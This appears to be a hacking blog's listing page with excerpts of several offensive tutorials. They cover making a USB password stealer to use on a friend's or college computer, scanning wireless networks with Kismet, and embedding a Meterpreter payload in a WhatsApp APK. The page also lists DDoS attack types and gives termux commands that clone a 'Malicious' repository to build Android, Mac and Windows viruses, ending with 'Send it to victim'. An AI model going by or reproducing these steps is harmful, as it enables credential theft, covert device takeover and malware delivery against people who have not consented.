Posts

How To Create Your Own USB Stealer?

Image
What Is A USB Stealer? USBStealer is a Windows Based Password Hacker Tool that helps to Extract the password from Windows-Based Applications such as Chrome Password, FireFox Password, NetPassword, Admin passwords of the Windows Computer. In This tutorial, I will show you how to Create Your Own USB password Stealer. As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passwords from their stored places. Using these tools and an USB pen-drive you can create your own rootkit to hack passwords from your friend’s/college Computer. While you’re making your own stealers, a better understanding of some Windows Run Commands & keyboard shortcuts may help you more! We need the

Wireless -wifi attack with -kali-parrot-debian-ubuntu

Image
Snipping Tool Kismet guide   > If you want to perform a wireless network penetration test, you must first scan all valid wireless access points. Just in Kali Linux, Kismet, a wireless network sniffing tool, is provided. Use this tool to measure the surrounding wireless signals and see all available wireless access points. This section will introduce sniffing wireless networks using Kismet tools. 1)  Start Kismet tool. The execution command is as follows: root@kali:~# kismet 2) Terminal extension > This interface is used to set whether to use the default color of the terminal. Because Kismet's default color is gray, some terminals may not be displayed. Use the default colors here, select Yes, the interface will display 3)  The interface prompts that the Kismet tool is running as the root user. At this time, select OK, and the interface will  shown 4) The interface prompts whether to start the Kismet service automatically. Select Yes, the interface will shown

HACKING ANDROID

  100% access  REQUIREMENTS  * KALI LINUX  * have the metasploit apk  * java 8 or +  * jarsigner installed  * install apktool  COMMANDS  apt-get update  apt-get install apktool  / * The technique is to embed a security hole in an example WhatsApp apk,  The steps to embed a Meterpreter in an APK file without errors are as follows * /  1 / Download an APK  example.apk  2 / Disassemble with “apktool” the Metasploit APK file and the APK file you are trying to modify.  3 / Copy all the smalter code from Meterpreter to the new smali directory of the APK.  4 / Find the code entry point inside the AndroidManifest.xml file of the APK application by searching for the line: <action android: name = "android.intent.action.MAIN" />  5 / Modify the “.smali” file of the activity to include a line that starts the Meterpreter stage.  6 / Copy all the Meterpreter permissions of the AndroidManifest.xml in the AndroidManifest.xml of the modified APK.  7 / Re-ass

Common DDOS Attack Types

Image
◾️ UDP Flood ◾️ ICMP (Ping) Flood ◾️ SYN Flood ◾️ Ping Of Death ◾️ Slow Loris ◾️ NTP Amplification ◾️ HTTP Flood  UDP FLOOD ◾️ A UDP flood is a form of volumetric Denial-of-Service (DoS) attack where the attacker targets and overwhelms random ports on the host with IP packets containing User Datagram Protocol (UDP) packets. In this type of attack, the host looks for applications associated with these datagrams ◾️  ICMP (PING) FLOOD ◾️ Ping flood, also known as ICMP flood, is a common Denial of Service (DoS) attack in which an attacker takes down a victim's computer by overwhelming it with ICMP echo requests, also known as pings ◾️  SYN FLOOD ◾️ A SYN flood is a form of denial-of-service attack in which an attacker sends a succession of SYN requests to a target's system in an attempt to consume enough server resources to make the system unresponsive to legitimate traffic ◾️  Ping Of Death ◾️ A ping of death is a type of attack on a computer system that

How to create a virus for android/windows/Mac using termux without root ⚠️

Image
How to create a virus for android/windows/Mac using termux without root ⚠️        Open your termux and type the following commands: 1.  $ pkg install git 2.  $ pkg install python 3.  $ git clone https://github.com/d3L3t3dOn3/Malicious 4. $ cd Malicious 5. $ unzip Malicious.zip 6. $ cd Malicious 7. $ pip2 install -r requirements.txt 8. $chmod +x malicious.py 9. $ python2 malicious.py   Type 【1】for making virus for *Android*, 【2】 for making virus for *Mac* and 【3】 for making virus for *Windows* Now select the virus type you want to make.   After some time it'll create a virus for you.    If you created virus for android then type: $cd Android    Here you can see your virus.Send it to victim.... Virus Move to sdcard $ mv sample.apk /sdcard For getting Elite.apk👆